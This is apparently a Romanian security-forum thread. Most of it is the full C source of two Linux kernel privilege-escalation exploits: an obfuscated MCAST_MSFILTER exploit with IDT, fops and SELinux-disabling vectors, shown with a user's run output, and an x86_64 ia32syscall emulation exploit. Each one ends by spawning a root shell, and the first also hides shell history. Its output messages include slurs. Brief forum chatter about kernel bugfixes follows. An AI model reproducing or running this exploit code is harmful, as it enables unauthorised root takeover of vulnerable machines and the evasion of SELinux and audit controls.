KERN_HHSYPPLORQTWGFD) && !ignore_flag) return 0; ka = fopen(filename, "r"); if(!ka) return 0; while(fgets(line, 512, ka) != NULL) { char *l_p = line; char *ra_p = reloc_a; char *r_p = reloc; memset(reloc, 0x00, sizeof(reloc)); memset(reloc_a, 0x00, sizeof(reloc_a)); while(*l_p != ' ' && (ra_p - reloc_a) < 64) *ra_p++ = *l_p++; l_p += 3; while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64) *r_p++ = *l_p++; if(!strcmp(reloc, s)) { __gggdfstsgdt_dddex("$$$ %s->%s\n", s, reloc_a); return strtoull(reloc_a, NULL, 16); } } return 0; } static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s) { return get_sym_ex(s, KALLSYMS, 0); } static int parse_cred(const char* val) { int i=0; const char* p = val; char local[64], *l; for(i=0; i<3; i++) { memset(local, 0x00, sizeof(local)); l = local; while(*p && *p != ',') *l++ = *p++; if(!(*p) && i != 2) return -1; _m_cred[i] = strtoull(local, NULL, 16); p++; } return 0; } #define SELINUX_OPS "selinux_ops" #define DUMMY_SECURITY_OPS "dummy_security_ops" #define CAPABILITY_OPS "capability_ops" #define SELINUX_ENFORCING "selinux_enforcing" #define AUDIT_ENABLED "audit_enabled" struct LSM_rhel *lsm_rhel_find_target(int check_rhel) { int i; char mapbuf[128]; struct LSM_rhel *lsm = &(known_targets[0]); if(check_rhel && !isRHHGDPPLADSF(krelease)) { __pppp_tegddewyfg("!!! N0t a RH3l k3rn3l \n"); return NULL; } __pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. \n"); for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++) { if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion)) { __gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion); return lsm; } } __pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...\n"); strcpy(mapbuf, "/boot/System.map-"); strcat(mapbuf, krelease); dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1); dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf, 1); if(!dyn4nt4n1labeggeyrthryt.selinux_ops || !dyn4nt4n1labeggeyrthryt.dummy_security_ops || !dyn4nt4n1labeggeyrthryt.capability_ops || !dyn4nt4n1labeggeyrthryt.selinux_enforcing || !dyn4nt4n1labeggeyrthryt.audit_enabled) return NULL; return &dyn4nt4n1labeggeyrthryt; } static void put_your_hands_up_hooker(int argc, char *argv[]) { int fd,ver,ret; char __b[16]; fd = open(KALLSYMS, O_RDONLY); ret = read(fd, __b, 16); // dummy read if((fd >= 0 && ret > 0)) { __pppp_tegddewyfg("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0 flags |= KERN_HHSYPPLORQTWGFD; } close(fd); ver = wtfyourunhere_heee(krelease, kversion); if(ver < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!\n"); __gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %s\n", krelease); if(argc != 1) { while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0) { switch(ret) { case 'i': flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS; useidt=1; // u have to use -i to force IDT Vector break; case 'f': flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT; break; case 'l': flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS; break; case 'c': if(!optarg || parse_cred(optarg) < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3z\n"); break; case 'k': if(optarg) _m_fops = strtoull(optarg, NULL, 16); else __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0P numb3rs\n"); break; case 's': if(!isSelinuxEnabled()) __pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?\n"); else flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX; break; case 'o': if(optarg) _m_cpu_off = strtoull(optarg, NULL, 16); else __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n"); break; } } } if(ver >= 29) // needs cred structure { flags |= KERN_DGGDYDTEGGETFDRLAK; if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) { _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD); _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD); _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD); } if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) { __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n"); } __pppp_tegddewyfg("$$$ Kernel Credentials detected\n"); *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0]; *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1]; *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2]; } if(ver >= 30) // needs cpu offset { flags |= KERN_DHHDYTMLADSFPYT; if(!_m_cpu_off) _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765); if(!_m_cpu_off) __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n"); __pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n"); *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off; *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off; } } static void env_prepare(int argc, char* argv[]) { put_your_hands_up_hooker(argc, argv); if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) // try fops { __pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d\n"); if(!_m_fops) _m_fops = get_sym(RW_FOPS); /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO * Thanks to the guy who killed this vector... you know who you are:) * Lucky for you, there are more:) */ if(_m_fops) { usefops=1; __pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzz\n"); } } if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel) { curr_target = lsm_rhel_find_target(1); if(!curr_target) { __pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n"); } else uselsm=1; } if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) { // -i flag curr_target = lsm_rhel_find_target(0); if(!curr_target) { __pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.\n"); /* remove Selinux Flag */ flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX; } } if(!usefops && !useidt && !uselsm) __yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l\n"); } static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack) { int socklen_l = 8 + stack - addr - 16; return socklen_l; } static struct socketcallAT at; static __dgdhdytrg55 idtover[4] = {0x00100000UL, 0x0020ee00UL, 0x00000000UL, 0x00000000UL}; static void fillsocketcallAT() { at.s = s; at.level = SOL_IP; at.optname = MCAST_MSFILTER; at.optval = buffer; at.optlen = &magiclen; } static void bitch_call(struct socketcallAT *at, void *stack) { asm volatile( "push %%ebx\t\n" "push %%esi\t\n" "push %%ecx\t\n" "push %%edx\t\n" "movl $0x66, %%eax\t\n" "movl $0xf, %%ebx\t\n" "movl %%esp, %%esi\t\n" "movl %0, %%ecx\t\n" "movl %1, %%esp\t\n" "int $0x80\t\n" "movl %%esi, %%esp\t\n" "pop %%edx\t\n" "pop %%ecx\t\n" "pop %%esi\t\n" "pop %%ebx\t\n" : : "r"(at), "r"(stack) : "memory", "eax", "ecx", "ebx", "esi" ); } static void __setmcbuffer(__dgdhdytrg55 value) { int i; __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer; for(i=0; i<sizeof(buffer)/sizeof(void*); i++) *(p+i) = value; } static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase) { int i; __dgdhdytrg55 curr; for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++) { curr = idtover[i]; __setmcbuffer(curr); magiclen = get_socklen(idtbase + (i*4), Y0Y0STOP); bitch_call(&at, (void*)Y0Y0STOP); } } static void y0y0stack() { void* map = mmap((void*)Y0Y0SMAP, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1,0); if(MAP_FAILED == map) __xxxfdgftr_hshsgdt("mmap"); } static void y0y0code() { void* map = mmap((void*)Y0Y0CMAP, PAGE_SIZE, #ifdef TRY_REMAP_DEFAULT PROT_READ|PROT_WRITE, #else PROT_READ|PROT_WRITE|PROT_EXEC, #endif MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1,0); if(MAP_FAILED == map) __xxxfdgftr_hshsgdt("mmap"); } static int rey0y0code(unsigned long old) { int fd; void *map; volatile char wizard; char cwd[1024]; getcwd(cwd, sizeof(cwd)); strcat(cwd, "/__tmpfile"); unlink(cwd); fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU); if(fd < 0) return -1; write(fd, (const void*)old, PAGE_SIZE); if(munmap((void*)old, PAGE_SIZE) < 0) return -1; map = mmap((void*)old, PAGE_SIZE, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, fd,0); if(map == MAP_FAILED) return -1; /* avoid lazy page fault handler * Triple Fault when using idt vector * and no pages are already mapped:) */ wizard = *((char*)old); unlink(cwd); return wizard; } int main(int argc, char*argv[]) { int uid,fd; __yyrhdgdtfs66ytgetrfd *patch, idtb; struct pollfd pfd; printf(BANNER); uid = getuid(); env_prepare(argc, argv); y0y0stack(); y0y0code(); if(useidt) { idtb = getidt(); __gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llx\n", idtb); __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - IDT m3th34d\n"); patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT); *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T); __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n"); if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) { __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n"); p4tch_sel1nux_codztegfaddczda(curr_target); } __dhdyetgdfstreg__((void*)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345)); } else if(usefops || uselsm) { __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d\n"); patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF); *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T); __setmcbuffer(J0J0S); __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n"); if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) { __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n"); p4tch_sel1nux_codztegfaddczda(curr_target); } __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0)); } /* set shellcode level 2 */ if(flags & KERN_DGGDYDTEGGETFDRLAK) { __pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3z\n"); __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr)); } else { __pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llz\n"); __dhdyetgdfstreg__((void*)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc)); *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid; } __pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4l\n"); s = socket(AF_INET, SOCK_DGRAM, 0); if(s < 0) __xxxfdgftr_hshsgdt("socket"); fillsocketcallAT(); #ifdef TRY_REMAP_DEFAULT if(rey0y0code(Y0Y0CMAP) < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1t\t\n"); #endif if(useidt) { __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd); __gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %d\n", 0xdd); idt_smash((idtentry)); sleep(1); asm volatile("int $0xdd\t\n"); } else if(usefops) { magiclen = get_socklen(_m_fops, Y0Y0STOP); magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd); __gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen); __pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3nt\n"); bitch_call(&at, (void*)Y0Y0STOP); sleep(1); fd = open(TMAGIC_66TDFDRTS, O_RDONLY); if(fd < 0) __xxxfdgftr_hshsgdt("!!! fuq t1m3r_l1st"); pfd.fd = fd; pfd.events = POLLIN | POLLOUT; poll(&pfd, 1, 0); } else if(uselsm) { int msqid; __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF); __yyrhdgdtfs66ytgetrfd dummy_msg_off = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF); __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF); msqid = msgget(0, IPC_PRIVATE|0600); if(msqid < 0) __xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t"); magiclen = get_socklen(selinux_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(dummy_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(dummy_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(capability_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(capability_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it } munmap((void*)Y0Y0CMAP, PAGE_SIZE); /* exec */ if(getuid() == 0) { pid_t pid; __pppp_tegddewyfg("$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n"); pid = fork(); if(pid == 0) { char *args[] = {"/bin/sh", "-i", NULL}; char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0", "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL }; execve("/bin/sh", args, envp); } else { int status; waitpid(pid, &status, 0); } } else __pppp_tegddewyfg("!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!\n"); close(s); return 0; } #endif // -m32 Rezultat pe 2.6.34.4-0.1-default (lipsa de ocupatie): nytro@rst[/home/nytro/Documents]: ./test Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y $$$ Kallsyms +r $$$ K3rn3l r3l3as3: 2.6.34.4-0.1-default $$$ prepare_creds->c02647b0 $$$ override_creds->c02645b0 $$$ revert_creds->c0264750 $$$ Kernel Credentials detected [COLOR="Red"]!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z[/COLOR] nytro@rst[/home/nytro/Documents]:

x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation Cate ceva despre el: http://rstcenter.com/forum/25902-die-hard-bug-bytes-linux-kernel-second-time.rst /* * exploit for x86_64 linux kernel ia32syscall emulation (again) * rediscovered by ben hawkes * with help from robert swiecki and tavis ormandy * * original vulnerability discovered by Wojciech Purczynski * * original exploit by * Robert Swiecki <robert_at_swiecki.net> * Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl> * Pawel Pisarczyk <pawel_at_immos.com.pl> * * kernel priv escalation code borrowed from spender * */ #include <sys/types.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <inttypes.h> #include <sys/reg.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <string.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int kernelmodecode(void *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret = 0, oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while (ret != EOF) { if (!oldstyle) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); } else { ret = fscanf(f, "%p %s\n", (void **) &addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) { continue; } p = strrchr(sname, '_'); if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') { p--; } *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { printf("resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } static void docall(uint64_t *ptr, uint64_t size) { commit_creds = (_commit_creds) get_symbol("commit_creds"); if (!commit_creds) { printf("symbol table not available, aborting!\n"); exit(1); } prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("symbol table not available, aborting!\n"); exit(1); } uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); printf("mapping at %lx\n", tmp); if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } for (; (uint64_t) ptr < (tmp + size); ptr++) *ptr = (uint64_t)kernelmodecode; __asm__("\n" "\tmovq $0x101, %rax\n" "\tint $0x80\n"); printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); execl("/bin/sh", "bin/sh", NULL); printf("no /bin/sh ??\n"); exit(0); } int main(int argc, char **argv) { int pid, status, set = 0; uint64_t rax; uint64_t kern_s = 0xffffffff80000000; uint64_t kern_e = 0xffffffff84000000; uint64_t off = 0x0000000800000101 * 8; if (argc == 4) { docall((uint64_t*)(kern_s + off), kern_e - kern_s); exit(0); } if ((pid = fork()) == 0) { ptrace(PTRACE_TRACEME, 0, 0, 0); execl(argv[0], argv[0], "2", "3", "4", NULL); perror("exec fault"); exit(1); } if (pid == -1) { printf("fork fault\n"); exit(1); } for ( { if (wait(&status) != pid) continue; if (WIFEXITED(status)) { printf("Process finished\n"); break; } if (!WIFSTOPPED(status)) continue; if (WSTOPSIG(status) != SIGTRAP) { printf("Process received signal: %d\n", WSTOPSIG(status)); break; } rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); if (rax == 0x000000000101) { if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { printf("PTRACE_POKEUSER fault\n"); exit(1); } set = 1; //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); } if ((rax == 11) && set) { ptrace(PTRACE_DETACH, pid, 0, 0); for( sleep(10000); } if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { printf("PTRACE_SYSCALL fault\n"); exit(1); } } return 0; }

Daca poti ajuta, de ce nu postezi aici sa ajuti mai multa lume?

Da, probabil cei de la Ubuntu repara astfel de probleme (banale) si le pastreaza decat pentru ei. Ceea ce inseamna ca sunt nesimtiti. Nu contribuie mai deloc la kernel, sunt un fel de leecheri. Oricum, inainte de compilare, am selectat mai toate optiunile, sa verific unde apar erori sau avertismente. Si la ultima versiune am primit o eroare fatala, dar nu am avut timp sa ma uit sa vad despre ce e vorba, a inceput scoala . O sa mai vin cu catea astfel de bugfix-uri, apoi cine stie, poate o sa mai invat cate ceva si trec mai departe. Edit: Pentru avertismentele acelea (xfs_alloc.c) a aparut patch-ul: http://www.kernel.org/diff/diffview.cgi?file=%2Fpub%2Flinux%2Fkernel%2Fv2.6%2Fnext%2Fpatch-v2.6.36-rc4-next-20100917.bz2;z=3819